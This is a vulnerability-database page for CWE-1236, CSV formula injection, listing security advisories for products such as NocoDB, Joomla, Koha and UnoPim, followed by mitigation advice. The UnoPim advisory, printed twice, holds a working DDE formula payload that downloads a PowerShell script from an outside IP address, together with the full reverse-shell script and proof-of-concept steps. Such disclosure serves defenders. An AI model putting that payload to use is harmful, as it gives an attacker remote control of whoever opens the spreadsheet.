CWE-1236
AllowedImproper Neutralization of Formula Elements in a CSV File
Abstraction: Base · Status: Incomplete
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
401 vulnerabilities reference this CWE, most recent first.
GHSA-6GJ9-93MW-92FP
Vulnerability from github – Published: 2022-05-13 01:19 – Updated: 2022-05-13 01:19OPSWAT MetaDefender before v4.11.2 allows CSV injection.
{
"affected": [],
"aliases": [
"CVE-2018-16275"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-08-31T13:29:00Z",
"severity": "HIGH"
},
"details": "OPSWAT MetaDefender before v4.11.2 allows CSV injection.",
"id": "GHSA-6gj9-93mw-92fp",
"modified": "2022-05-13T01:19:14Z",
"published": "2022-05-13T01:19:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16275"
},
{
"type": "WEB",
"url": "https://onlinehelp.opswat.com/corev4/10._Release_notes.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6GJQ-VMWG-37PV
Vulnerability from github – Published: 2022-01-11 00:00 – Updated: 2025-08-26 21:30In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed.
{
"affected": [],
"aliases": [
"CVE-2022-22121"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-10T16:15:00Z",
"severity": "HIGH"
},
"details": "In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed.",
"id": "GHSA-6gjq-vmwg-37pv",
"modified": "2025-08-26T21:30:54Z",
"published": "2022-01-11T00:00:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22121"
},
{
"type": "WEB",
"url": "https://github.com/nocodb/nocodb/commit/079e3abe"
},
{
"type": "WEB",
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6M2G-5GF8-CV5J
Vulnerability from github – Published: 2025-09-08 18:31 – Updated: 2025-09-08 21:30A CSV injection vulnerability in the /id_profiles endpoint of Avigilon ACM v7.10.0.20 allows attackers to execute arbitrary code via suuplying a crafted Excel file.
{
"affected": [],
"aliases": [
"CVE-2025-56267"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-08T18:15:34Z",
"severity": "CRITICAL"
},
"details": "A CSV injection vulnerability in the /id_profiles endpoint of Avigilon ACM v7.10.0.20 allows attackers to execute arbitrary code via suuplying a crafted Excel file.",
"id": "GHSA-6m2g-5gf8-cv5j",
"modified": "2025-09-08T21:30:59Z",
"published": "2025-09-08T18:31:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-56267"
},
{
"type": "WEB",
"url": "https://github.com/nikolas-ch/CVEs/blob/main/AvigilonACM_v7.10.0.20/CSV_Injection/CSV_Injection.txt"
},
{
"type": "WEB",
"url": "https://github.com/nikolas-ch/CVEs/tree/main/AvigilonACM_v7.10.0.20"
},
{
"type": "WEB",
"url": "https://github.com/nikolas-ch/CVEs/tree/main/AvigilonACM_v7.10.0.20/CSV_Injection"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6MR8-2XXJ-PR7J
Vulnerability from github – Published: 2022-05-24 16:47 – Updated: 2023-01-30 18:30An issue was discovered in Joomla! before 3.9.7. The CSV export of com_actionslogs is vulnerable to CSV injection.
{
"affected": [],
"aliases": [
"CVE-2019-12765"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-06-11T19:29:00Z",
"severity": "CRITICAL"
},
"details": "An issue was discovered in Joomla! before 3.9.7. The CSV export of com_actionslogs is vulnerable to CSV injection.",
"id": "GHSA-6mr8-2xxj-pr7j",
"modified": "2023-01-30T18:30:30Z",
"published": "2022-05-24T16:47:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12765"
},
{
"type": "WEB",
"url": "https://developer.joomla.org/security-centre/783-20190601-core-csv-injection-in-com-actionlogs"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/108736"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6MXJ-JJJJ-8MPV
Vulnerability from github – Published: 2022-11-14 19:00 – Updated: 2022-11-17 03:30The WPForms Pro WordPress plugin before 1.7.7 does not validate its form data when generating the exported CSV, which could lead to CSV injection.
{
"affected": [],
"aliases": [
"CVE-2022-3574"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-11-14T15:15:00Z",
"severity": "CRITICAL"
},
"details": "The WPForms Pro WordPress plugin before 1.7.7 does not validate its form data when generating the exported CSV, which could lead to CSV injection.",
"id": "GHSA-6mxj-jjjj-8mpv",
"modified": "2022-11-17T03:30:53Z",
"published": "2022-11-14T19:00:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3574"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/0eae5189-81af-4344-9e96-dd1f4e223d41"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6PC6-7FMG-34VV
Vulnerability from github – Published: 2025-02-20 18:31 – Updated: 2025-11-04 21:31PHPJabbers Cinema Booking System v1.0 is vulnerable to CSV Injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on Languages section Labels any parameters field in System Options that is used to construct CSV file.
{
"affected": [],
"aliases": [
"CVE-2023-51333"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-20T18:15:24Z",
"severity": "HIGH"
},
"details": "PHPJabbers Cinema Booking System v1.0 is vulnerable to CSV Injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on Languages section Labels any parameters field in System Options that is used to construct CSV file.",
"id": "GHSA-6pc6-7fmg-34vv",
"modified": "2025-11-04T21:31:30Z",
"published": "2025-02-20T18:31:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51333"
},
{
"type": "WEB",
"url": "https://packetstorm.news/files/id/176511"
},
{
"type": "WEB",
"url": "https://www.phpjabbers.com/cinema-booking-system/#sectionDemo"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/176511/PHPJabbers-Cinema-Booking-System-1.0-CSV-Injection.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6Q72-8PQ4-4XPR
Vulnerability from github – Published: 2022-02-11 00:01 – Updated: 2022-02-11 00:01CA Harvest Software Change Manager versions 13.0.3, 13.0.4, 14.0.0, and 14.0.1, contain a vulnerability in the CSV export functionality, due to insufficient input validation, that can allow a privileged user to potentially execute arbitrary code or commands.
{
"affected": [],
"aliases": [
"CVE-2022-22689"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-02-04T23:15:00Z",
"severity": "HIGH"
},
"details": "CA Harvest Software Change Manager versions 13.0.3, 13.0.4, 14.0.0, and 14.0.1, contain a vulnerability in the CSV export functionality, due to insufficient input validation, that can allow a privileged user to potentially execute arbitrary code or commands.",
"id": "GHSA-6q72-8pq4-4xpr",
"modified": "2022-02-11T00:01:17Z",
"published": "2022-02-11T00:01:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22689"
},
{
"type": "WEB",
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-7399-8GQJ-GP2J
Vulnerability from github – Published: 2022-05-24 17:34 – Updated: 2022-05-24 17:34A CSV injection vulnerability in the Admin portal for Netskope 75.0 allows an unauthenticated user to inject malicious payload in admin's portal thus leads to compromise admin's system.
{
"affected": [],
"aliases": [
"CVE-2020-28845"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-11-20T20:15:00Z",
"severity": "HIGH"
},
"details": "A CSV injection vulnerability in the Admin portal for Netskope 75.0 allows an unauthenticated user to inject malicious payload in admin\u0027s portal thus leads to compromise admin\u0027s system.",
"id": "GHSA-7399-8gqj-gp2j",
"modified": "2022-05-24T17:34:39Z",
"published": "2022-05-24T17:34:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28845"
},
{
"type": "WEB",
"url": "http://the-it-wonders.blogspot.com/2020/11/netskope-csv-injection-in-admin-ui.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-74RG-6F92-G6WX
Vulnerability from github – Published: 2025-08-22 16:50 – Updated: 2025-08-22 21:09Summary
Description:
CSV Injection or Formula Injection is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.
Details
A basic test for CSV Injection is using SUM() to add two numbers or open calc.exe using
command:
=cmd|' /C calc'!A0
The same method can be used to run arbitrary code on the victim's machine. For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker's machine. Payload:
This is our payload and will be used in the vulnerable field during exploitation
=cmd|' /C powershell Invoke-WebRequest
"http://52.172.182.242:7000/shell.ps1" -OutFile "$env:Temp\shell.ps1";
powershell -ExecutionPolicy Bypass -File "$env:Temp\shell.ps1"'!A1
shell.ps1:
$client = New-Object System.Net.Sockets.TCPClient('52.172.182.242',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
PoC:
- Go to any product and click on Edit
- Add the above discussed payload in any field that accept text for e.g. Product Number field.
- Quick Export -> Select CSV, Open the csv, the formula will get executed during opening.
This could be injected by admin or any user that has privilege to edit products. Also the CSRF Injection reported at product edit feature can be used as an attack vector to add such payloads.
Please note that if this is replicated on version starting from Office 2021:
Follow these steps:
Go to File > Options > Trust Center > Trust Center Settings > External Content -> Enable Dynamic Data Exchange Server Launch".
This is due to Office 2021 and Microsoft 365 have DDE disabled by default for enhanced security.
Platform Details: Replicated this on Office 2021 on Windows 11. POC video link: https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3
Impact
When the victim opens the CSV, the injected formula which fetches a reverse shell script written in Powershell from attacker's server and executes it. This creates a reverse shell connection from victim's device to attacker's allowing an attacker to perform any action on the victim's device.
Recommendation:
- Avoid starting values with Equals sign (=), Plus sign (+), Minus sign (-), At symbol (@), Tab (0x09), Carriage return (0x0D).
- Sanitize the vulnerable field using regex or standard libraries.
- Wrap the value around double quotes for fields that cannot be sanitized for some reason so that the value is considered as string instead of formula.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.3.0"
},
"package": {
"ecosystem": "Packagist",
"name": "unopim/unopim"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-55745"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-22T16:50:05Z",
"nvd_published_at": "2025-08-22T17:15:35Z",
"severity": "LOW"
},
"details": "### Summary\nDescription:\n`CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.\n\n### Details\nA basic test for CSV Injection is using `SUM()` to add two numbers or open calc.exe\u200b using\u200b\ncommand:\n `=cmd|\u0027 /C calc\u0027!A0\u200b`\n\n\nThe same method can be used to run arbitrary code on the victim\u0027s machine.\nFor example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker\u0027s machine.\n*Payload*:\n\u003e This is our payload and will be used in the vulnerable field during exploitation\n```\n =cmd|\u0027 /C powershell Invoke-WebRequest\n \"http://52.172.182.242:7000/shell.ps1\" -OutFile \"$env:Temp\\shell.ps1\";\n powershell -ExecutionPolicy Bypass -File \"$env:Temp\\shell.ps1\"\u0027!A1\u200b\n```\n\n*shell.ps1*:\n```\n $client = New-Object System.Net.Sockets.TCPClient(\u002752.172.182.242\u0027,8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex \". { $data } 2\u003e\u00261\" | Out-String ); $sendback2 = $sendback + \u0027PS \u0027 + (pwd).Path + \u0027\u003e \u0027;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\u200b\n```\n\n### PoC:\n\n 1. Go to any product and click on Edit\n 2. Add the above discussed payload in any field that accept text for e.g. Product Number field.\n 3. Quick Export -\u003e Select CSV, Open the csv, the formula will get executed during opening.\n\n\u003e This could be injected by admin or any user that has privilege to edit products.\n\u003e Also the CSRF Injection reported at product edit feature can be used as an attack vector to add such payloads.\n\n\nPlease note that if this is replicated on version starting from Office 2021:\nFollow these steps:\nGo to `File \u003e Options \u003e Trust Center \u003e Trust Center Settings \u003e External Content\u200b -\u003e Enable Dynamic Data Exchange Server Launch\"`.\nThis is due to Office 2021 and Microsoft 365 have DDE disabled by default for enhanced security.\n\nPlatform Details:\nReplicated this on Office 2021 on Windows 11.\nPOC video link: https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3\n\n### Impact\nWhen the victim opens the CSV, the injected formula which fetches a reverse shell script written in Powershell from attacker\u0027s server and executes it. This creates a reverse shell connection from victim\u0027s device to attacker\u0027s allowing an attacker to perform any action on the victim\u0027s device.\n\n### Recommendation:\n- Avoid starting values with Equals sign (=), Plus sign (+), Minus sign (-), At symbol (@), Tab (0x09), Carriage return (0x0D).\n- Sanitize the vulnerable field using regex or standard libraries.\n- Wrap the value around double quotes for fields that cannot be sanitized for some reason so that the value is considered as string instead of formula.",
"id": "GHSA-74rg-6f92-g6wx",
"modified": "2025-08-22T21:09:43Z",
"published": "2025-08-22T16:50:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55745"
},
{
"type": "WEB",
"url": "https://github.com/unopim/unopim/commit/8325b78567411ad78d44c0385f192360e608ff71"
},
{
"type": "WEB",
"url": "https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34"
},
{
"type": "WEB",
"url": "https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3"
},
{
"type": "PACKAGE",
"url": "https://github.com/unopim/unopim"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P",
"type": "CVSS_V4"
}
],
"summary": "UnoPim has CSV Injection on Quick Export feature"
}
GHSA-74RV-FQ96-J6VR
Vulnerability from github – Published: 2024-02-13 00:30 – Updated: 2025-09-29 15:30CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.
{
"affected": [],
"aliases": [
"CVE-2024-24337"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-12T22:15:08Z",
"severity": "HIGH"
},
"details": "CSV Injection vulnerability in \u0027/members/moremember.pl\u0027 and \u0027/admin/aqbudgets.pl\u0027 endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the \u0027Budget\u0027 and \u0027Patrons Member\u0027 components.",
"id": "GHSA-74rv-fq96-j6vr",
"modified": "2025-09-29T15:30:29Z",
"published": "2024-02-13T00:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24337"
},
{
"type": "WEB",
"url": "https://nitipoom-jar.github.io/CVE-2024-24337"
},
{
"type": "WEB",
"url": "https://nitipoom-jaroonchaipipat.github.io/security-research-portal/2024-24337"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Mitigation
If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
Mitigation
Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
No CAPEC attack patterns related to this CWE.